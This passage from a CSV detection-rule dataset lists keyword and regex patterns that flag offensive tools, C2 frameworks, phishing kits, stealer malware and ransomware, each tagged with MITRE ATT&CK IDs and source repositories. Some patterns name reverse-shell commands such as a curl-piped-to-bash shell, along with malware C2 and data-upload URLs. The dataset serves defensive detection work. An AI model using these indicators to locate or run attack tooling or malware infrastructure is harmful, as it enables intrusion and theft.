menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*http-request-smuggler-all.jar*",".{0,1000}http\-request\-smuggler\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*https://*.gofile.io/uploadFile*",".{0,1000}https\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://*/.htaccess?c=cmd*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*https://*/.htaccess?c=uname -a*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*https://*/releases/download/*/lse.sh*",".{0,1000}https\:\/\/.{0,1000}\/releases\/download\/.{0,1000}\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*https://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}https\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*https://0.0.0.0:1337*",".{0,1000}https\:\/\/0\.0\.0\.0\:1337.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*https://127.0.0.1/dns-query*",".{0,1000}https\:\/\/127\.0\.0\.1\/dns\-query.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*https://127.0.0.1:5000/register*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/register.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*https://127.0.0.1:5000/results/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/results\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*https://127.0.0.1:5000/tasks/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/tasks\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design*",".{0,1000}https\:\/\/5pider\.net\/blog\/2024\/01\/27\/modern\-shellcode\-implant\-design.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*https://amsi.fail/*",".{0,1000}https\:\/\/amsi\.fail\/.{0,1000}","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.","T1059.001 - T1562.001 - T1027.005","TA0002 - TA0005 - TA0008","N/A","N/A","Defense Evasion","https://amsi.fail/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://api.localxpose.io/api/v2/downloads/loclx-darwin-amd64.zip*",".{0,1000}https\:\/\/api\.localxpose\.io\/api\/v2\/downloads\/loclx\-darwin\-amd64\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://avred.r00ted.ch/upload*",".{0,1000}https\:\/\/avred\.r00ted\.ch\/upload.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*https://best-wishes-to-you*",".{0,1000}https\:\/\/best\-wishes\-to\-you.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://bitbucket.org/evilgreyswork/*",".{0,1000}https\:\/\/bitbucket\.org\/evilgreyswork\/.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","1","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*https://browserling.com/tor-testing*",".{0,1000}https\:\/\/browserling\.com\/tor\-testing.{0,1000}","offensive_tool_keyword","browserling","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","browserling.com","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*https://C2_SERVER_IP/*",".{0,1000}https\:\/\/C2_SERVER_IP\/.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","0","#contentstrings","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*https://cdn.discordapp.com/attachments/976805447266877471/987826721250238464/c33cd7baf5e2abdf434c2793988ccb56.png*",".{0,1000}https\:\/\/cdn\.discordapp\.com\/attachments\/976805447266877471\/987826721250238464\/c33cd7baf5e2abdf434c2793988ccb56\.png.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://cnc.mkbot.info/alertmsg.zip*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/alertmsg\.zip.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*https://cnc.mkbot.info/handshake.php*",".{0,1000}https\:\/\/cnc\.mkbot\.info\/handshake\.php.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*https://code.kryo.se/iodine/iodine-*",".{0,1000}https\:\/\/code\.kryo\.se\/iodine\/iodine\-.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*https://crackstation.net/*",".{0,1000}https\:\/\/crackstation\.net\/.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Credential Access","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*https://curlshell:*",".{0,1000}https\:\/\/curlshell\:.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*https://curlshell:* | bash",".{0,1000}https\:\/\/curlshell\:.{0,1000}\s\|\sbash","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "*https://cyseclabs.com/exploits/*",".{0,1000}https\:\/\/cyseclabs\.com\/exploits\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*https://default-password.info/*",".{0,1000}https\:\/\/default\-password\.info\/.{0,1000}","offensive_tool_keyword","default-password.info","default passwords database","T1110 - T1082","TA0006 - TA0001","N/A","N/A","Credential Access","https://default-password.info/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://discord.com/invite/5Hpj4Gs5SS*",".{0,1000}https\:\/\/discord\.com\/invite\/5Hpj4Gs5SS.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*https://dns.blokada.org/dns-query*",".{0,1000}https\:\/\/dns\.blokada\.org\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*https://dns10.quad9.net:5053/dns-query*",".{0,1000}https\:\/\/dns10\.quad9\.net\:5053\/dns\-query.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*https://dnsdumpster.com/*",".{0,1000}https\:\/\/dnsdumpster\.com\/.{0,1000}","offensive_tool_keyword","dnsdumpster","dns recon & research - find & lookup dns records","T1018 - T1596.001 - T1590.002","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://dnsdumpster.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*https://drive.google.com/file/d/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ*",".{0,1000}https\:\/\/drive\.google\.com\/file\/d\/1WLJGs3ZUypf6hLh5WL4AJmsKdUOZo5yZ.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*https://erwan2212.github.io/NTHASH-FPC*",".{0,1000}https\:\/\/erwan2212\.github\.io\/NTHASH\-FPC.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*https://ffuf.io.fi*",".{0,1000}https\:\/\/ffuf\.io\.fi.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*https://ffuf.io/FUZZ*",".{0,1000}https\:\/\/ffuf\.io\/FUZZ.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*https://free-399rs-jio-recharge*",".{0,1000}https\:\/\/free\-399rs\-jio\-recharge.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://github.com/bitsadmin/*",".{0,1000}https\:\/\/github\.com\/bitsadmin\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*https://github.com/curl/curl/wiki/DNS-over-HTTPS*",".{0,1000}https\:\/\/github\.com\/curl\/curl\/wiki\/DNS\-over\-HTTPS.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*https://github.com/dekrypted/*",".{0,1000}https\:\/\/github\.com\/dekrypted\/.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","github user host multiple stealers projects","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*https://github.com/m0nad/Diamorphine*",".{0,1000}https\:\/\/github\.com\/m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*https://github.com/The-Viper-One*",".{0,1000}https\:\/\/github\.com\/The\-Viper\-One.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*https://gitlab.com/kalilinux/*",".{0,1000}https\:\/\/gitlab\.com\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://hashtoolkit.com/generate-hash/?text=*",".{0,1000}https\:\/\/hashtoolkit\.com\/generate\-hash\/\?text\=.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*https://itm4n.github.io/windows-registry-rpceptmapper-eop/*",".{0,1000}https\:\/\/itm4n\.github\.io\/windows\-registry\-rpceptmapper\-eop\/.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*https://join-zoom-online-meeting*",".{0,1000}https\:\/\/join\-zoom\-online\-meeting.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*https://kali.download/*",".{0,1000}https\:\/\/kali\.download\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*https://localhost:7443/*",".{0,1000}https\:\/\/localhost\:7443\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*",".{0,1000}https\:\/\/mastodon\.be\/\@username_fzihfzuhfuoz\/109994357971853428.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*",".{0,1000}https\:\/\/mastodon\.be\/username_fzihfzuhfuoz\/109743339821428173.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*https://nemesis.*.com/api/*",".{0,1000}https\:\/\/nemesis\..{0,1000}\.com\/api\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*https://ntlm.pw*",".{0,1000}https\:\/\/ntlm\.pw.{0,1000}","offensive_tool_keyword","ntlm.pw","Database of NTLM hashes","T1003 - T1555 - T1558","TA0006","N/A","N/A","Credential 